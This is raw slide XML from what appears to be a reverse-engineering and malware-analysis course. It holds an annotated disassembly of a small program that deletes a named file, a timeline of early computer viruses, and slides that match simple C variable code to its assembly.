            <a:ext cx="4266498" cy="5078313"/>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004113CE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> 	[ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 3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004113D2 jz 	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>loc_4113D8</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004113D4 xor 	eax, eax</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004113D6 jmp 	short loc_411414</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>004113D8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> mov 	esi, esp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>save ESP value</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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004113DA push 	2 ; 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>MaxCount</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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004113DC push 	offset Str2 ; 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>"-r"</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004113E1 mov 	eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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004113E4 mov 	ecx, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>agrv[1]</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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004113E7 push 	ecx ; 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Str1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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004113E8 call	 strncmp ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>return to EAX</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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004113F8 test	 eax, eax</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004113FA jnz 	short loc_411412</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004113FC mov 	esi, esp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004113FE mov 	eax, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00411401 mov 	ecx, [eax+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00411404 push 	ecx ; 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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00411405 call 	DeleteFileA</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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89"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="902" name="Google Shape;902;p89"/>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Local &amp; global variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Operation +, -, ++, --, %</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>if</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>while</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Function calls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Other: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="30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9"/>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History Computer Virus &amp; Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p9"/>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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1949, John von Neumann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>“Theory and Organization of Complicated Automata” </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1971, Creeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>(Bob Thomas at BBN Technologies) is able to move between computers.  </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1974, Wabbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>A self-replicating program copied itself until it bogs down the system </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1982, Elk Cloner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>: Written by a 15-year-old, Elk Cloner is one of the earliest widespread, self-replicating viruses to affect personal computers. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1986, Fred Cohen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Coined the term “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600"/>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>” in his Ph.D thesis.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1986 –  Brain Boot Sector Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Generally regarded as the first virus to infect MS-DOS computers.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1986 , PC-Write Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>the earliest Trojans as a popular shareware program called “PC-Writer.”. It would erase all of a user’s files.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1988, Morris Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>infected a substantial percentage of computers connected to ARPANET, bringing the network down within 24 hours. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1991, Michelangelo Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>was designed to erase information from hard drives on March 6th, the birthday of the famed Renaissance artist. Impacted about 10,000 systems, but the hype significantly raised public awareness of computer viruses.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>1999, Melissa Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>the first mass-emailed virus, utilized Outlook address books from infected machines, and mailed itself to 50 people at a time.</a:t>
            </a:r>
            <a:endParaRPr sz="16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90"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="909" name="Google Shape;909;p90"/>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Global &amp; Local variable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Google Shape;910;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1844824"/>
            <a:ext cx="3125225" cy="2031325"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</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void main()</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", x);</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Google Shape;911;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="4151366"/>
            <a:ext cx="3125225" cy="2031325"/>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void main()</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", x);</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="1844823"/>
            <a:ext cx="4835363" cy="2031325"/>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00401003 mov 	eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60;  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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00401008 add 	eax, dword_40C000; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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0040100E mov 	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
